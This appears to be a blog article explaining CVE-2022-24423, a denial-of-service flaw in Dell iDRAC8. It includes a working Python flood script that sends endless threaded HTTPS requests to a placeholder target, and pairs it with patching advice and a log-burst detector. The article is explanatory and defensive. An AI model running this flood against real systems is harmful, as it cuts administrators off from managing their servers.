Dell’s Integrated Dell Remote Access Controller 8 (iDRAC8) offers remote management features for Dell servers. But in early 2022, security researchers found a serious issue: a remote attacker could crash the iDRAC8 webserver with simple requests, without logging in.
In this article, I’ll break down CVE-2022-24423, show how the bug works with simple code, reference the original sources, and discuss what organizations should do about it.
What Is CVE-2022-24423?
CVE-2022-24423 is a denial of service (DoS) vulnerability in the Dell iDRAC8 web server (firmware versions before 2.83.83.83). A remote attacker, without any authentication, can repeatedly send crafted web requests that exhaust system resources. This results in the web server (the iDRAC management interface) becoming unavailable, meaning administrators can’t use it to monitor or control their servers remotely.
How Does the Exploit Work?
The bug centers on resource exhaustion: the iDRAC8 web server does not limit or efficiently manage incoming HTTP connections or requests. An attacker can abuse this by looping HTTP requests (for example, with curl, wget, or a browser script) until the webserver can’t handle more.
After reaching its resource limits, the web interface locks up (crashes or becomes unresponsive), so legitimate admins lose access until the iDRAC is reset or the server is power cycled.
Simple Python Exploit Example
Below is an educational PoC (Proof-of-Concept) to demonstrate how the attack could work. NEVER attack systems you don’t own.
```python
import threading
import requests

# Replace with your iDRAC8's IP address
target_host = "https://IDRAC8_IP"


def flood():
    # Loop forever, sending one HTTPS GET after another to the web server
    while True:
        try:
            requests.get(target_host, verify=False, timeout=1)
        except requests.RequestException:
            pass  # Ignore errors (connection reset, timeout, etc.) and keep going


threads = []
for _ in range(20):  # 20 concurrent threads for impact
    t = threading.Thread(target=flood)
    t.start()
    threads.append(t)

for t in threads:
    t.join()
```
What this does:
Spawns 20 threads, each making endless HTTPS requests to the iDRAC8 web server. Within seconds to a few minutes, iDRAC8 will slow down, then become unresponsive to other users. The web interface will need a reset or reboot to recover.
Note: This code is a simplified version and only for testing on equipment you own or have permission to assess.
How Can Attackers Use This?
- No password required: Anyone who knows the IP address of your iDRAC8 can exploit this, which is especially dangerous on the public Internet.
- Cheap: It doesn’t take much bandwidth or resources to trigger a denial of service.
- Impact: During a DoS attack, you lose remote administration, monitoring, firmware upgrades, and troubleshooting abilities for the server until someone manually resets the iDRAC8 module.
Defensive Measures
Patch now:
- Dell fixed this in iDRAC8 version 2.83.83.83. Download and upgrade your firmware.
- Dell Security Advisory DSA-2022-035
Network best practices:
- Use firewalls and management VPNs for remote access.
Monitor and audit logs:
- Look for bursts of failed connections to iDRAC8. Unusual traffic might indicate scanning or attempted exploitation.
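As an added example (not part of the original article and not Dell tooling), here is a small sliding-window detector for the "bursts" described above, run over a constructed CLF-style access log; the log format, the IP addresses, and the window/threshold values are assumptions, since iDRAC8's own log format is not shown on this page.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample access log (CLF-like; NOT real iDRAC8 output).
# 203.0.113.5 hammers the web root without authenticating; 198.51.100.7 is a normal admin.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Apr/2022:21:15:00 +0000] "GET / HTTP/1.1" 401
203.0.113.5 - - [21/Apr/2022:21:15:00 +0000] "GET / HTTP/1.1" 401
203.0.113.5 - - [21/Apr/2022:21:15:01 +0000] "GET / HTTP/1.1" 401
203.0.113.5 - - [21/Apr/2022:21:15:01 +0000] "GET / HTTP/1.1" 401
203.0.113.5 - - [21/Apr/2022:21:15:02 +0000] "GET / HTTP/1.1" 401
198.51.100.7 - - [21/Apr/2022:21:15:02 +0000] "GET / HTTP/1.1" 200
203.0.113.5 - - [21/Apr/2022:21:15:02 +0000] "GET / HTTP/1.1" 401
198.51.100.7 - - [21/Apr/2022:21:16:30 +0000] "GET / HTTP/1.1" 200
"""

# Assumed line layout: client IP, two ignored fields, [timestamp], "request", status
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})'
)


def find_bursts(log_text, window_seconds=10, threshold=5):
    """Return {ip: peak_count} for every source that sent more than `threshold`
    requests inside any `window_seconds` span. A resource-exhaustion flood never
    needs to authenticate, so the per-source request rate is the signal here,
    not the response status."""
    recent = defaultdict(deque)  # per-IP timestamps still inside the window
    peaks = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not parse
        ip = m.group("ip")
        ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z").timestamp()
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window_seconds:
            q.popleft()  # drop requests that fell out of the window
        if len(q) > threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks


if __name__ == "__main__":
    for ip, n in find_bursts(SAMPLE_LOG).items():
        print(f"burst from {ip}: {n} requests inside a 10 s window")
```

Tune the window and threshold to the normal request rate of your own management network before alerting on the result.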
References
- Dell Security Advisory DSA-2022-035
- NVD CVE-2022-24423 Details
- Dell iDRAC8 Downloads
- BleepingComputer Coverage
Conclusion
CVE-2022-24423 is a classic reminder: even management interfaces can be vulnerable to the simplest attacks. If you run Dell servers with iDRAC8, check your firmware. Always limit remote management access and keep up with security advisories. Don’t let attackers pull the plug on your management tools with just a burst of HTTP requests.
Timeline
Published on: 04/21/2022 21:15:00 UTC
Last modified on: 06/22/2022 18:15:00 UTC